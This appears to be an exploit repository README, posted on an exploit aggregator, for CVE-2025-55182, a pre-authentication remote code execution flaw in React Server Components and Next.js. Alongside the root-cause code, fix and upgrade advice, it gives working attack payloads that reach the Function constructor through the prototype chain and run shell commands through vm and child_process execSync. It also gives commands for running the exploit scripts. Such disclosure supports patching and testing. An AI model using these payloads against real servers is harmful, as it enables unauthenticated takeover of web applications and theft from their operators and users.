## https://sploitus.com/exploit?id=F338D58D-2088-5C39-9AC2-F0870BBDDAA5
# CVE-2025-55182 - React Server Components Pre-Auth RCE
## Executive Summary
A **pre-authentication remote code execution** vulnerability exists in React Server Components. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, allowing attackers to execute arbitrary code on the server without any authentication.
**CVSS Score**: 10.0 (Critical)
## Vulnerability Details
| Field | Value |
|-------|-------|
| CVE | CVE-2025-55182 |
| Type | Remote Code Execution via Unsafe Deserialization |
| CWE | CWE-502 (Deserialization of Untrusted Data) |
| Attack Vector | Network (Pre-Authentication) |
| Privileges Required | None |
### Affected Packages
- `react-server-dom-webpack`
- `react-server-dom-parcel`
- `react-server-dom-turbopack`
### Affected Versions
- 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Experimental canary releases starting with 14.3.0-canary.77
### Affected Frameworks
- Next.js 15.x and 16.x (App Router with Server Actions)
### Fixed Versions
| Package | Fixed Versions |
|---------|---------------|
| React | 19.0.1, 19.1.2, 19.2.1 |
| Next.js | 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 |
## Technical Analysis
### Root Cause
The vulnerability is in the `requireModule` function in `react-server-dom-webpack`:
```javascript
// VULNERABLE CODE (v19.0.0)
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
// ...
return moduleExports[metadata[2]]; // NO hasOwnProperty check!
}
```
The missing `hasOwnProperty` check allows accessing prototype chain properties like `constructor`, enabling the exploit chain.
### The Fix
```javascript
// PATCHED CODE (v19.2.1)
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
// ...
if (hasOwnProperty.call(moduleExports, metadata[2])) // FIX: Check own property
return moduleExports[metadata[2]];
}
```
### Exploit Chain
1. **Attacker sends malicious payload** via `multipart/form-data` POST to any Server Action endpoint
2. **`decodeAction` deserializes** the payload using the Flight protocol
3. **Prototype chain access**: Using `module#constructor` accesses `Object` via prototype
4. **Function access**: `Object.constructor` gives access to `Function` constructor
5. **RCE achieved**: If dangerous modules (`vm`, `child_process`) are bundled, direct code execution
### Attack Payloads
**Prototype Chain Access (always works):**
```javascript
{
id: 'fs#constructor', // Any module in manifest
bound: []
}
// Returns: Object (via prototype chain)
```
**Direct RCE (when vm is bundled):**
```javascript
{
id: 'vm#runInThisContext',
bound: ['process.mainModule.require("child_process").execSync("id").toString()']
}
// Returns: Command output
```
**Direct RCE (when child_process is bundled):**
```javascript
{
id: 'child_process#execSync',
bound: ['id']
}
// Returns: Command output
```
## Proof of Concept
### Directory Structure
```
/tmp/react-rce-poc/ # Simulated POC (demonstrates vulnerability pattern)
/tmp/react-rsc-real/ # Real POC using actual react-server-dom-webpack@19.0.0
/tmp/react-rsc-patched/ # Patched version (19.2.1) for comparison
```
### Setup & Run
```bash
# Install dependencies
cd /tmp/react-rce-poc
npm install
# Start vulnerable server (port 3001)
npm start
# Run exploit (in another terminal)
npm run exploit
# Or with custom command
CMD="whoami" npm run exploit
```
### Real React POC
```bash
cd /tmp/react-rsc-real
npm install
node --conditions react-server --conditions webpack src/server.js
# Run exploit
node exploit-rce-v4.js
```
### Verify Patch Works
```bash
cd /tmp/react-rsc-patched
npm install # Installs react-server-dom-webpack@19.2.1
node --conditions react-server --conditions webpack src/server.js
# Run exploit - should fail for prototype chain access
node exploit-test.js
```
## Exploitation Conditions
### Always Exploitable
- Prototype chain access (`constructor`, `__proto__`) - blocked by patch
### Conditionally Exploitable (RCE)
Requires one of these modules to be bundled:
- `vm` (via `runInThisContext`)
- `child_process` (via `execSync`, `spawn`, etc.)
- Any module with code execution capabilities
**Common scenarios where dangerous modules are bundled:**
- App or dependency imports `child_process` for any reason
- Logging libraries that spawn processes
- Build tools accidentally included in bundle
- Testing utilities not properly excluded
## Verified Test Results
| Test | Vulnerable (19.0.0) | Patched (19.2.1) |
|------|---------------------|------------------|
| `fs#constructor` (prototype chain) | โ Returns Object | โ BLOCKED |
| `vm#runInThisContext` (in manifest) | โ RCE | N/A* |
| `child_process#execSync` (in manifest) | โ RCE | N/A* |
*When modules are explicitly in manifest with real exports, they work - but real apps don't have `vm`/`child_process` in their server action manifests.
## Mitigation
### Immediate Actions
1. **Upgrade React packages** to 19.0.1, 19.1.2, or 19.2.1
2. **Upgrade Next.js** to a patched version (see table above)
### Check Your Versions
```bash
npm ls react-server-dom-webpack react-server-dom-parcel react-server-dom-turbopack
```
If you see 19.0.0, 19.1.0, 19.1.1, or 19.2.0 - **you are vulnerable**.
### For Canary Users
Users on 14.3.0-canary.77 or later should:
- Downgrade to 14.x stable, OR
- Downgrade to 14.3.0-canary.76
## References
- [React PR #35277](https://github.com/facebook/react/pull/35277) - The fix
- [Next.js Security Advisory](https://nextjs.org/docs/security)
- [NIST CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
## Timeline
- **Vulnerability Introduced**: React 19.0.0
- **Fix Released**: React 19.0.1, 19.1.2, 19.2.1
- **CVE Assigned**: CVE-2025-55182
## Disclaimer
This POC is for **authorized security testing only**. Only test systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal.
## Files in This Repository
| File | Description |
|------|-------------|
| `server.js` | Simulated vulnerable server demonstrating the pattern |
| `exploit.js` | Exploit script for testing |
| `README.md` | This documentation |
| `TECHNICAL-ANALYSIS.md` | Deep technical analysis of the vulnerability |